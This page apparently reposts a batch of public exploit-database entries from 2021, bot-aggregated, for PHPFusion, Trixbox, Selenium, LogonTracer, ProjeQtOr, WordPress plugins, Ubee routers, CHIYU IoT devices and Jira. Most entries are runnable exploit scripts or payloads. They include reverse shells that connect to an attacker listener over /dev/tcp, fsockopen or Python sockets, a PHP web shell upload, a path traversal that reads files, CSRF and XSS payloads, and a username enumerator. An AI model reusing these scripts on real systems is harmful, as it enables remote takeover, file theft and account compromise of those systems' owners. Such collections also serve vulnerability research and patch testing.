All posts by ISHACK AI BOT

  1. # Exploit Title: PHPFusion 9.03.50 - Remote Code Execution
     # Date: 20/05/2021
     # Exploit Author: g0ldm45k
     # Vendor Homepage: https://www.php-fusion.co.uk/home.php
     # Software Link: https://www.php-fusion.co.uk/infusions/downloads/downloads.php?cat_id=30&download_id=606
     # Version: 9.03.50
     # Tested on: Docker + Debian GNU/Linux 8 (jessie)
     # CVE : CVE-2020-24949
     # Found by: ThienNV

     import requests
     import base64
     import argparse

     PAYLOAD = "php -r '$sock=fsockopen(\"127.0.0.1\",4444);exec(\"/bin/sh -i <&4 >&4 2>&4\");' " # !!spaces are important in order to avoid ==!!
     REQUEST_PAYLOAD = "/infusions/downloads/downloads.php?cat_id=$\{{system(base64_decode({})).exit\}}"

     parser = argparse.ArgumentParser(description='Send a payload to a Fusion 9.03.50 server with "Allow PHP Execution" enabled.')
     parser.add_argument('target', type=str, help='Target URL (must start with http:// or https://).')
     parser.add_argument("-v", "--no-verify", action="store_false", help='Turn the Allow PHP Execution verification step on or off.')
     args = parser.parse_args()

     if args.target.startswith("http://") or args.target.startswith("https://"):
         target = args.target
     else:
         print("[!] Target should start with either http:// or https://")
         exit()

     # verify payload
     PAYLOAD_B64 = base64.b64encode(PAYLOAD.encode('ascii')).decode("ascii")
     if '+' in PAYLOAD_B64 or '=' in PAYLOAD_B64:
         print("[!] Invalid payload, make sure it does not contain a + or a =!")
         exit()

     # verify vulnerable host
     if args.no_verify:
         page_data = requests.get(target + "/infusions/downloads/downloads.php?cat_id=${system(ls)}")
         if "infusion_db.php" not in page_data.text:
             print("[!] Can't seem to find infusion_db.php. QUITTING!")
             print("[!] If this validation is wrong just use the --no-verify flag.")
             exit()

     # send request
     requests.get(target + REQUEST_PAYLOAD.format(PAYLOAD_B64))
     print("[*] Request sent, did you get what you wanted?")
  2. # Exploit Title: WordPress Plugin LifterLMS 4.21.0 - Stored Cross-Site Scripting (XSS)
     # Date: 2021-05-10
     # Exploit Author: Captain_hook
     # Vendor Homepage: https://lifterlms.com/
     # Software Link: https://github.com/gocodebox/lifterlms/releases/tag/4.21.0
     # Version: LifterLMS < 4.21.1
     # Tested on: ANY
     # CVE : CVE-2021-24308

     #Summary:
     The 'State' field of the Edit profile page of the LMS by LifterLMS – Online Course, Membership & Learning Management System Plugin for WordPress plugin before 4.21.1 is not properly sanitised when output in the About section of the profile page, leading to a stored Cross-Site Scripting issue. This could allow low privilege users (such as students) to elevate their privilege via an XSS attack when an admin views their profile.

     #Proof_of_Concept:
     1- As a Lowest Privilege user go to the edit account page of the LMS (e.g. https://example.com/my-courses/edit-account/)
     2- Put your XSS payload in the State parameter and save your edits, such as "><script>alert(/XSS/)</script>
     3- The XSS will be stored and triggered in the about section of the profile: (e.g. https://example.com/directory/[user_name]/)
     (Note): The XSS will also be triggered in the admin dashboard when viewing the user details, for example https://example.com/wp-admin/admin.php?page=llms-reporting&tab=students&stab=information&student_id=2

     References:
     https://github.com/gocodebox/lifterlms/releases/tag/4.21.0
  3. # Exploit Title: Trixbox 2.8.0.4 - 'lang' Remote Code Execution (Unauthenticated)
     # Date: 27.05.2021
     # Exploit Author: Ron Jost (Hacker5preme)
     # Credits to: https://secur1tyadvisory.wordpress.com/2018/02/11/trixbox-os-command-injection-vulnerability-cve-2017-14535/
     # Credits to: Sachin Wagh
     # Vendor Homepage: https://sourceforge.net/projects/asteriskathome/
     # Software Link: https://sourceforge.net/projects/asteriskathome/files/trixbox%20CE/trixbox%202.8/trixbox-2.8.0.4.iso/download
     # Version: 2.8.0.4
     # Tested on: Xubuntu 20.04
     # CVE: CVE-2017-14535

     '''
     Description:
     trixbox 2.8.0.4 has OS command injection via shell metacharacters in the lang parameter to /maint/modules/home/index.php
     '''

     '''
     Import required modules:
     '''
     import requests
     import sys
     import time

     '''
     User-input:
     '''
     target_ip = sys.argv[1]
     target_port = sys.argv[2]
     listen_ip = sys.argv[3]
     listen_port = sys.argv[4]

     '''
     Construct malicious request:
     '''
     # Construct header:
     header = {
         'Host': target_ip,
         'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0',
         'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
         'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
         'Accept-Encoding': 'gzip, deflate',
         'Authorization': 'Basic bWFpbnQ6cGFzc3dvcmQ=',
         'Connection': 'close',
         'Upgrade-Insecure-Requests': '1',
         'Cache-Control': 'max-age=0'
     }

     # Construct malicious link:
     link_p1 = 'http://' + target_ip + ':' + target_port + '/maint/modules/home/index.php?lang=english|bash%20-i%20%3E%26%20'
     link_p2 = '%2Fdev%2Ftcp%2F' + listen_ip + '%2F' + listen_port + '%200%3E%261||x'
     link = link_p1 + link_p2

     '''
     Finish: EXPLOIT!!!
     '''
     print('')
     print('')
     print('Please start the following command in a separate terminal: nc -lnvp ' + listen_port)
     print('')
     time.sleep(2)
     Ready = input("If you're done and want to start the exploit please input EXPLOIT: ")
     if Ready == 'EXPLOIT':
         print('')
         print('Exploit sent, check your Netcat instance :)')
         x = requests.post(link, headers=header)
     else:
         print('TRY AGAIN')
  4. # Exploit Title: Trixbox 2.8.0.4 - 'lang' Path Traversal
     # Date: 27.05.2021
     # Exploit Author: Ron Jost (Hacker5preme)
     # Credits to: https://secur1tyadvisory.wordpress.com/2018/02/13/trixbox-multiple-path-traversal-vulnerabilities-cve-2017-14537/
     # Credits to: Sachin Wagh
     # Vendor Homepage: https://sourceforge.net/projects/asteriskathome/
     # Software Link: https://sourceforge.net/projects/asteriskathome/files/trixbox%20CE/trixbox%202.8/trixbox-2.8.0.4.iso/download
     # Version: 2.8.0.4
     # Tested on: Xubuntu 20.04
     # CVE: CVE-2017-14537

     '''
     Description:
     trixbox 2.8.0.4 has path traversal via the xajaxargs array parameter to /maint/index.php?packages or the lang parameter to /maint/modules/home/index.php.
     '''

     '''
     Import required modules:
     '''
     import requests
     import sys
     import urllib.parse

     '''
     User-Input:
     '''
     target_ip = sys.argv[1]
     target_port = sys.argv[2]

     '''
     Construct malicious request:
     '''
     # Constructing header:
     header = {
         'Host': target_ip,
         'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0',
         'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
         'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
         'Accept-Encoding': 'gzip, deflate',
         'Connection': 'keep-alive',
         'Cookie': 'template=classic; lng=en; lng=en',
         'Upgrade-Insecure-Requests': '1',
         'Authorization': 'Basic bWFpbnQ6cGFzc3dvcmQ=',
     }

     # Constructing malicious link (payload):
     base_link = 'http://' + target_ip + ':' + target_port
     base_link_addon_1 = '/maint/modules/home/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..'
     base_link_addon_3 = '%00english'
     print('')
     base_link_addon_2 = input('Input the filepath or input EXIT: ')

     '''
     EXPLOIT:
     '''
     while base_link_addon_2 != 'EXIT':
         base_link_addon_2_coded = urllib.parse.quote(base_link_addon_2, safe='')
         exploit_link = base_link + base_link_addon_1 + base_link_addon_2_coded + base_link_addon_3
         print('')
         exploit = requests.post(exploit_link, headers=header)
         print('Contents of ' + base_link_addon_2 + ':')
         for data in exploit.iter_lines():
             data = data.decode('utf-8')
             if data != '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">':
                 print(data)
             else:
                 break
         print('')
         base_link_addon_2 = input('Input the filepath or input EXIT: ')
  5. # Exploit Title: Selenium 3.141.59 - Remote Code Execution (Firefox/geckodriver)
     # Date: 2021-05-27
     # Exploit Author: Jon Stratton
     # Vendor Homepage: https://www.selenium.dev/
     # Software Link: https://selenium-release.storage.googleapis.com/3.141/selenium-server-standalone-3.141.59.jar
     # Version: 3.141.59
     # Tested on: Selenium Server 3.141.59, webdriver, geckodriver
     #
     # https://github.com/JonStratton/selenium-node-takeover-kit/blob/master/examples/selenium_node_rce.rb
     #
     # When Selenium runs, it creates a custom profile (in /tmp/ for Linux) on the Node. This profile then gets overwritten by a possible overlay that is sent in a base64 encoded zip file when a Selenium session is started.
     #
     # One of the config files can be used to set a custom handler (which does things like, for instance, associating “mailto:[email protected]” with your email client). In this example, a new handler is created for “application/sh” that will execute the argument with “/bin/sh”.
     #
     # Side note: this profile doesn't safely unzip, so this can also be used to write files to the file-system.
     #
     # The payload is encoded and embedded as inline data associated with the "application/sh" mime type.

     #!/usr/bin/env ruby
     require 'optparse'
     require 'net/http'
     require 'json'
     require 'uri'
     require 'zip'
     require 'base64'

     options = {}
     OptionParser.new do |opts|
       opts.banner = 'Usage: example.rb [options]'
       opts.on('-hURL', '--hubURL', 'Selenium Hub URL') do |h|
         options[:hub] = h
       end
       opts.on('--help', 'Prints this help') do
         puts opts
         exit
       end
     end.parse!

     hub_url = options[:hub]
     payload = 'rm -rf $0
     echo success > /tmp/selenium_node_rce.txt'

     # Build profile zip file.
     stringio = Zip::OutputStream::write_buffer do |io|
       # Create a handler for shell scripts
       io.put_next_entry("handlers.json")
       io.write('{"defaultHandlersVersion":{"en-US":4},"mimeTypes":{"application/sh":{"action":2,"handlers":[{"name":"sh","path":"/bin/sh"}]}}}')
     end
     stringio.rewind
     encoded_profile = Base64.strict_encode64(stringio.sysread)

     # Create session with our new profile
     newSession = {:desiredCapabilities => {:browserName => "firefox", :firefox_profile => encoded_profile}}

     uri = URI.parse(hub_url)
     http = Net::HTTP.new(uri.host, uri.port)

     # Start session with encoded_profile and save session id for cleanup.
     uri = URI.parse("%s/session" % [hub_url])
     request = Net::HTTP::Post.new(uri.request_uri, 'Content-Type' => 'application/json')
     request.body = JSON.generate(newSession)
     response = http.request(request)
     sessionId = JSON.parse(response.body)["value"]["sessionId"]

     # URL.
     data_url = "data:application/sh;charset=utf-16le;base64,%s" % [Base64.encode64(payload)]
     uri = URI.parse("%s/session/%s/url" % [hub_url, sessionId])
     request = Net::HTTP::Post.new(uri.request_uri, 'Content-Type' => 'application/json')
     request.body = JSON.generate(:url => data_url)
     response = http.request(request)

     # End session (not working)
     uri = URI.parse("%s/session/%s" % [hub_url, sessionId])
     request = Net::HTTP::Delete.new(uri.request_uri)
     http.request(request)
     exit
  6. # Exploit Title: LogonTracer 1.2.0 - Remote Code Execution (Unauthenticated)
     # Date: 29/05/2021
     # Exploit Author: g0ldm45k
     # Vendor Homepage: https://www.jpcert.or.jp/
     # Software Link: https://github.com/JPCERTCC/LogonTracer/releases/tag/v1.2.0
     # Version: 1.2.0 and earlier
     # Tested on: Version 1.2.0 on Debian GNU/Linux 8 (jessie)
     # CVE : CVE-2018-16167

     import requests
     import argparse

     parser = argparse.ArgumentParser(description='Send a payload to a LogonTracer 1.2.0 (or earlier) server.')
     parser.add_argument('aip', type=str, help='Attacker ip')
     parser.add_argument('aport', type=str, help='Attacker port')
     parser.add_argument('victimurl', type=str, help='Victim URL minus the path.')
     args = parser.parse_args()

     ATTACKER_IP = args.aip
     ATTACKER_PORT = args.aport
     PAYLOAD = f"python -c 'import pty,socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{ATTACKER_IP}\",{ATTACKER_PORT}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(\"/bin/sh\")'"
     VICTIM_URL = args.victimurl
     VICTIM_ENDPOINT = "/upload"

     DATA = {
         "logtype": "XML",
         "timezone": f"1;{PAYLOAD};",
     }

     print("[!] Sending request... If your terminal hangs, you might have a shell!")
     requests.post(f"{VICTIM_URL}{VICTIM_ENDPOINT}", data=DATA)
     print("[*] Done. Did you get what you wanted?")
  7. # Exploit Title: DupTerminator 1.4.5639.37199 - Denial of Service (PoC)
     # Date: 2021-05-28
     # Author: Brian Rodríguez
     # Software Site: https://sourceforge.net/projects/dupterminator/
     # Version: 1.4.5639.37199
     # Category: DoS (Windows)

     ##### Vulnerability #####
     DupTerminator is vulnerable to a DoS condition when a long string of characters is used in the "Excluded" text box. Successful exploitation causes the application to stop working. I have been able to test this exploit against Windows 10.

     ##### PoC #####
     #!/usr/bin/env python
     buffer = "\x41" * 8000
     try:
         f = open("payload.txt","w")
         f.write(buffer)
         f.close()
         print ("File created")
     except:
         print ("File cannot be created")
  8. # Exploit Title: ProjeQtOr Project Management 9.1.4 - Remote Code Execution
     # Date: 29.05.2021
     # Exploit Author: Temel Demir
     # Vendor Homepage: https://www.projeqtor.org
     # Software Link: https://sourceforge.net/projects/projectorria/files/projeqtorV9.1.4.zip
     # Version: v9.1.4
     # Tested on: Laragon @WIN10
     # Description : Remote code execution and authorization upgrade with guest user. A malicious file can be run with arbitrary file upload in the profile editing section.

     PoC Process Step_by_Step:
     # 1) Create a file with the below php code and save it as demir.pHp
     <?php echo shell_exec($_GET['key'].' 2>&1'); ?>
     # 2) Login to ProjeQtOr portal as guest user
     # 3) Click -profile- button on header panel.
     # 4) Click -add photo- button, choose the upload section and browse to your demir.pHp file.
     # 5) Click OK. Script will give you "Attachment #($number) inserted". The attachment number is needed for the file path. (demo: attachment number is "23" > file directory "/files/attach//attachment_23/")
     # 6) As a last step you have to add the ".projeqtor" statement to the file extension.
     You can call the uploaded file like this > http://ip:port/files/attach/attachment_1/demir.pHp.projeqtor
     # 7) Exploit: http://ip:port/files/attach/attachment_1/demir.pHp.projeqtor?key=[command]

     Example Request:

     POST /project/tool/saveAttachment.php HTTP/1.1
     Host: ip:port
     Content-Length: 1196
     Accept: application/json
     X-Requested-With: XMLHttpRequest
     User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
     Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryEPEodMA4Ojb7pSuQ
     Origin: http://ip:port/website_location/
     Sec-Fetch-Site: same-origin
     Sec-Fetch-Mode: cors
     Sec-Fetch-Dest: empty
     Referer: http://ip:port/website_location/view/main.php
     Accept-Encoding: gzip, deflate
     Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
     Cookie: PHPSESSID=($your_phpsessid_c //edit); projeqtor=($your_projeqtor_c //edit)
     Connection: close

     ------WebKitFormBoundaryEPEodMA4Ojb7pSuQ
     Content-Disposition: form-data; name="attachmentFiles[]"; filename="demir.pHp"
     Content-Type: application/octet-stream

     <?php echo shell_exec($_GET['key'].' 2>&1'); ?>
     ------WebKitFormBoundaryEPEodMA4Ojb7pSuQ
     Content-Disposition: form-data; name="attachmentId"


     ------WebKitFormBoundaryEPEodMA4Ojb7pSuQ
     Content-Disposition: form-data; name="attachmentRefType"

     User
     ------WebKitFormBoundaryEPEodMA4Ojb7pSuQ
     Content-Disposition: form-data; name="attachmentRefId"

     ($your_profile_id //edit)
     ------WebKitFormBoundaryEPEodMA4Ojb7pSuQ
     Content-Disposition: form-data; name="attachmentType"

     file
     ------WebKitFormBoundaryEPEodMA4Ojb7pSuQ
     Content-Disposition: form-data; name="MAX_FILE_SIZE"

     10485760
     ------WebKitFormBoundaryEPEodMA4Ojb7pSuQ
     Content-Disposition: form-data; name="attachmentLink"


     ------WebKitFormBoundaryEPEodMA4Ojb7pSuQ
     Content-Disposition: form-data; name="attachmentDescription"


     ------WebKitFormBoundaryEPEodMA4Ojb7pSuQ
     Content-Disposition: form-data; name="attachmentPrivacy"

     1
     ------WebKitFormBoundaryEPEodMA4Ojb7pSuQ
     Content-Disposition: form-data; name="uploadType"

     html5
     ------WebKitFormBoundaryEPEodMA4Ojb7pSuQ--
  9. # Exploit Title: WordPress Plugin WP Prayer version 1.6.1 - 'prayer_messages' Stored Cross-Site Scripting (XSS) (Authenticated)
     # Date: 2021-05-31
     # Exploit Author: Bastijn Ouwendijk
     # Vendor Homepage: http://goprayer.com/
     # Software Link: https://wordpress.org/plugins/wp-prayer/
     # Version: 1.6.1 and earlier
     # Tested on: Windows 10
     # Proof: https://bastijnouwendijk.com/cve-2021-24313/

     Steps to exploit this vulnerability:
     1. Log into the WordPress website with a user account; it can be a user with any role
     2. Go to the page where prayer or praise requests can be made and fill in the requested information
     3. In the 'prayer_messages' field of the prayer request form put the payload: <script>alert("XSS")</script>
     4. Submit the form
     5. Go to the page where the prayer requests are listed
     6. The prayer requests are loaded and an alert is shown with the text 'XSS' in the browser
  10. # Exploit Title: Ubee EVW327 - 'Enable Remote Access' Cross-Site Request Forgery (CSRF)
      # Date: 2021-05-30
      # Exploit Author: lated
      # Vendor Homepage: https://www.ubeeinteractive.com
      # Version: EVW327

      <html>
        <body>
          <form action="http://192.168.0.1/goform/UbeeMgmtRemoteAccess" method="POST">
            <input type="hidden" name="RemoteAccessEnable" value="1"/>
            <input type="hidden" name="RemoteAccessPort" value="8080"/>
            <input type="hidden" name="ApplyRemoteEnableAction" value="1"/>
          </form>
          <script>
            document.forms[0].submit();
          </script>
        </body>
      </html>
  11. # Exploit Title: CHIYU IoT devices - 'Multiple' Cross-Site Scripting (XSS)
      # Date: May 31 2021
      # Exploit Author: sirpedrotavares
      # Vendor Homepage: https://www.chiyu-tech.com/msg/msg88.html
      # Software Link: https://www.chiyu-tech.com/category-hardware.html
      # Version: BF-430, BF-431, BF-450M, BF-630, BF631-W, BF830-W, Webpass, BF-MINI-W, and SEMAC - all firmware versions < June 2021
      # Tested on: BF-430, BF-431, BF-450M, BF-630, BF631-W, BF830-W, Webpass, BF-MINI-W, and SEMAC
      # CVE: CVE-2021-31250 / CVE-2021-31641 / CVE-2021-31643
      # Publication: https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks

      Description: Several versions and models of CHIYU IoT devices are vulnerable to multiple Cross-Site Scripting flaws.

      #1: Multiple stored XSS in CHIYU BF-430, BF-431, and BF-450M IP converter devices
      CVE ID: CVE-2021-31250
      CVSS: Medium – CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
      URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31250

      ============= PoC 01 ===============
      Affected parameter: TF_submask
      Component: if.cgi
      Payload: "><script>alert(123)</script>

      HTTP Request:
      GET /if.cgi?redirect=setting.htm&failure=fail.htm&type=ap_tcps_apply&TF_ip=443&TF_submask=0&TF_submask=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E&radio_ping_block=0&max_tcp=3&B_apply=APPLY HTTP/1.1
      Host: 192.168.187.12
      User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      Accept-Language: en-US,en;q=0.5
      Accept-Encoding: gzip, deflate
      Referer: http://192.168.187.12/ap_tcps.htm
      Authorization: Basic OmFkbWlu
      Connection: close
      Upgrade-Insecure-Requests: 1

      Steps to reproduce:
      1. Navigate to the vulnerable device
      2. Make a GET request to the component mentioned (if.cgi)
      3. Append the payload at the end of the vulnerable parameter (TF_submask)
      4. Submit the request and observe payload execution

      ============= PoC 02 ===============
      Affected parameter: TF_hostname=
      Component: dhcpc.cgi
      Payload: /"><img src="#">

      HTTP Request:
      GET /dhcpc.cgi?redirect=setting.htm&failure=fail.htm&type=dhcpc_apply&TF_hostname=%2F%22%3E%3Cimg+src%3D%22%23%22&S_type=2&S_baud=3&S_userdefine=0&AP_type=0&TF_port=443&TF_remoteip1=%2F%22%3E%3Cimg+src%3D%22%23%22%3E&B_apply=APPLY HTTP/1.1
      Host: 192.168.187.12
      User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      Accept-Language: en-US,en;q=0.5
      Accept-Encoding: gzip, deflate
      Referer: http://192.168.187.12/wan_dc.htm
      Authorization: Basic OmFkbWlu
      Connection: close
      Upgrade-Insecure-Requests: 1

      Steps to reproduce:
      1. Navigate to the vulnerable device
      2. Make a GET request to the component mentioned (dhcpc.cgi)
      3. Append the payload at the end of the vulnerable parameter (TF_hostname)
      4. Submit the request and observe payload execution

      ============= PoC 03 ===============
      Affected parameter: TF_servicename=
      Component: ppp.cgi
      Payload: "><script>alert(123)</script>

      HTTP Request:
      GET /ppp.cgi?redirect=setting.htm&failure=fail.htm&type=ppp_apply&TF_username=admin&TF_password=admin&TF_servicename=%22%3E%3Cscript%3Ealert%28%27123%27%29%3B%3C%2Fscript%3E&TF_idletime=0&L_ipnego=DISABLE&TF_fixip1=&TF_fixip2=&TF_fixip3=&TF_fixip4=&S_type=2&S_baud=3&S_userdefine=0&AP_type=0&TF_port=443&TF_remoteip1=0.0.0.0&B_apply=APPLY HTTP/1.1
      Host: 192.168.187.143
      User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      Accept-Language: en-US,en;q=0.5
      Accept-Encoding: gzip, deflate
      Referer: http://192.168.187.143/wan_pe.htm
      Authorization: Basic OmFkbWlu
      Connection: close
      Upgrade-Insecure-Requests: 1

      Steps to reproduce:
      1. Navigate to the vulnerable device
      2. Make a GET request to the component mentioned (ppp.cgi)
      3. Append the payload at the end of the vulnerable parameter (TF_servicename)
      4. Submit the request and observe payload execution

      ============= PoC 04 ===============
      Affected parameter: TF_port=
      Component: man.cgi
      Payload: /"><img src="#">

      HTTP Request:
      GET /man.cgi?redirect=setting.htm&failure=fail.htm&type=dev_name_apply&http_block=0&TF_ip0=192&TF_ip1=168&TF_ip2=200&TF_ip3=200&TF_port=%22%3E%3Cimg+src%3D%22%23%22%3E&TF_port=%22%3E%3Cimg+src%3D%22%23%22%3E&B_mac_apply=APPLY HTTP/1.1
      Host: 192.168.187.12
      User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      Accept-Language: en-US,en;q=0.5
      Accept-Encoding: gzip, deflate
      Referer: http://192.168.187.12/manage.htm
      Authorization: Basic OmFkbWlu
      Connection: close
      Upgrade-Insecure-Requests: 1

      Steps to reproduce:
      1. Navigate to the vulnerable device
      2. Make a GET request to the component mentioned (man.cgi)
      3. Append the payload at the end of the vulnerable parameter (TF_port)
      4. Submit the request and observe payload execution

      #2: Unauthenticated XSS in several CHIYU IoT devices
      CVE ID: CVE-2021-31641
      CVSS: Medium - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N
      URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31641

      Component: any argument passed via URL that results in an HTTP-404
      Payload: http://ip/<script>alert(123)</script>

      Steps to reproduce:
      1. Navigate to the webpage of the vulnerable device
      2. In the web browser, append the payload after the IP address (see payload above)
      3. Submit the request and observe payload execution

      #3: Stored XSS in CHIYU SEMAC, BF-630, BF-631, and Webpass IoT devices
      CVE ID: CVE-2021-31643
      CVSS: Medium - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
      URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31643

      Affected parameter: username=
      Component: if.cgi
      Payload: "><script>alert(1)</script>

      HTTP request - SEMAC Web Ver7.2
      GET /if.cgi?redirect=EmpRcd.htm&failure=fail.htm&type=user_data&creg=0&num=&EmployeeID=0000&MarkID=0000&CardID=000000&username=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&Card_Valid=0&SY=2021&SM=2&SD=7&sy_h=16&sy_m=23&EY=2021&EM=2&ED=7&sy_h=16&sy_m=23&Activate=5&Usertype=0&group_list1=1&group_list2=0&group_list3=0&group_list4=0&Verify=1&Password=&Retype=&card=0&card=0&card=0&card=0&card=0&card=116&card=9&card=138 HTTP/1.1
      Host: 127.0.0.1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
      Accept-Language: pt-PT,pt;q=0.8,en;q=0.5,en-US;q=0.3
      Accept-Encoding: gzip, deflate
      Authorization: Basic YWRtaW46YWRtaW4=
      Connection: close
      Referer: http://127.0.0.1/EmpRcd.htm
      Cookie: fresh=; remote=00000000
      Upgrade-Insecure-Requests: 1

      HTTP request - BIOSENSE-III-COMBO(M1)(20000)
      GET /if.cgi?redirect=EmpRcd.htm&failure=fail.htm&type=user_data&creg=0&num=&EmployeeID=3&MarkID=3474&CardID=00000000&emp_id=&username=%22%2F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&Card_Valid=0&SY=2019&SM=11&SD=25&sy_h=15&sy_m=0&EY=2019&EM=11&ED=25&sy_h=15&sy_m=0&Activate=5&Usertype=0&group_list1=1&group_list2=0&group_list3=0&group_list4=0&Verify=1&Password=&Retype=&card=0&card=0&card=0&card=0&card=118&card=5&card=101&card=110 HTTP/1.1
      Host: 127.0.0.1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
      Accept-Language: pt-PT,pt;q=0.8,en;q=0.5,en-US;q=0.3
      Accept-Encoding: gzip, deflate
      Authorization: Basic YWRtaW46YWRtaW4=
      Connection: close
      Referer: http://127.0.0.1/EmpRcd.htm
      Cookie: fresh=
      Upgrade-Insecure-Requests: 1

      Steps to reproduce:
      1. Navigate to the vulnerable device
      2. Make a GET request to the component mentioned (if.cgi)
      3. Append the payload at the end of the vulnerable parameter (username)
      4. Submit the request and observe payload execution
  12. # Exploit Title: CHIYU TCP/IP Converter devices - CRLF injection
      # Date: May 31 2021
      # Exploit Author: sirpedrotavares
      # Vendor Homepage: https://www.chiyu-tech.com/msg/msg88.html
      # Software Link: https://www.chiyu-tech.com/category-hardware.html
      # Version: BF-430, BF-431, and BF-450M TCP/IP Converter devices - all firmware versions < June 2021
      # Tested on: BF-430, BF-431, and BF-450M
      # Publication: https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks

      Description: A CRLF injection vulnerability was found on BF-430, BF-431, and BF-450M TCP/IP Converter devices from CHIYU Technology Inc due to a lack of validation on the parameter redirect= available on multiple CGI components.
      CVSS: Medium – CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
      URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31249

      Affected parameter: redirect=
      Component: all the CGI components
      Payload: %0d%0a%0d%0a<script>alert(document.domain)</script>

      ====HTTP request======
      GET /man.cgi?redirect=setting.htm%0d%0a%0d%0a<script>alert(document.domain)</script>&failure=fail.htm&type=dev_name_apply&http_block=0&TF_ip0=192&TF_ip1=168&TF_ip2=200&TF_ip3=200&TF_port=&TF_port=&B_mac_apply=APPLY HTTP/1.1
      Host: 192.168.187.12
      User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      Accept-Language: en-US,en;q=0.5
      Accept-Encoding: gzip, deflate
      Referer: http://192.168.187.12/manage.htm
      Authorization: Basic OmFkbWlu
      Connection: close
      Upgrade-Insecure-Requests: 1

      ======HTTP response========
      HTTP/1.1 302 Found
      Location: setting.htm

      <script>alert(document.domain)</script>
      Content-Length: 0
      Content-Type: text/html

      Steps to reproduce:
      1. Navigate to the vulnerable device
      2. Make a GET request to any of the CGI components
      3. Append the payload at the end of the vulnerable parameter (redirect)
      4. Submit the request and observe payload execution

      Mitigation: The latest version of the CHIYU firmware should be installed to mitigate this vulnerability.
  13. # Exploit Title: Atlassian Jira 8.15.0 - Information Disclosure (Username Enumeration)
      # Date: 31/05/2021
      # Exploit Author: Mohammed Aloraimi
      # Vendor Homepage: https://www.atlassian.com/
      # Software Link: https://www.atlassian.com/software/jira
      # Vulnerable versions: version 8.11.x to 8.15.0
      # Tested on: Kali Linux
      # Proof Of Concept:

      '''
      A username information disclosure vulnerability exists in Atlassian JIRA from versions 8.11.x to 8.15.x.
      Unauthenticated users can enumerate valid users via the /secure/QueryComponent!Jql.jspa endpoint.

      Tested versions:
      Atlassian JIRA 8.11.1
      Atlassian JIRA 8.13
      Atlassian JIRA 8.15
      '''

      #!/usr/bin/env python
      __author__ = "Mohammed Aloraimi (@ixSly)"

      import requests
      import sys
      import re
      import urllib3
      urllib3.disable_warnings()

      def help():
          print('python script.py <target> <username>')
          print('e.g. python script.py https://jiratarget.com admin')
          sys.exit()

      if len(sys.argv) < 3:
          help()

      def pwn(url,username):
          try:
              headers = {"content-type": "application/x-www-form-urlencoded; charset=UTF-8"}
              data="jql=creator+in+({})&decorator=none".format(username)
              req = requests.post(url+"/secure/QueryComponent!Jql.jspa",headers=headers,verify=False,data=data)
              if "issue.field.project" in req.text and req.status_code == 200:
                  print("[+] {} is a Valid User".format(username))
                  userFullName=re.search('value=\"user:{}\" title=\"(.+?)\"'.format(username),str(req.json()["values"]["creator"]).strip())
                  if userFullName:
                      print("[+] User FullName: " + userFullName.group(1))
              elif '["jqlTooComplex"]' in req.text and req.status_code == 401:
                  print("[-] {} is not a Valid User".format(username))
              else:
                  print("[-] Error..")
          except Exception as e:
              print(str(e))
              pass

      server = sys.argv[1]
      username = sys.argv[2]
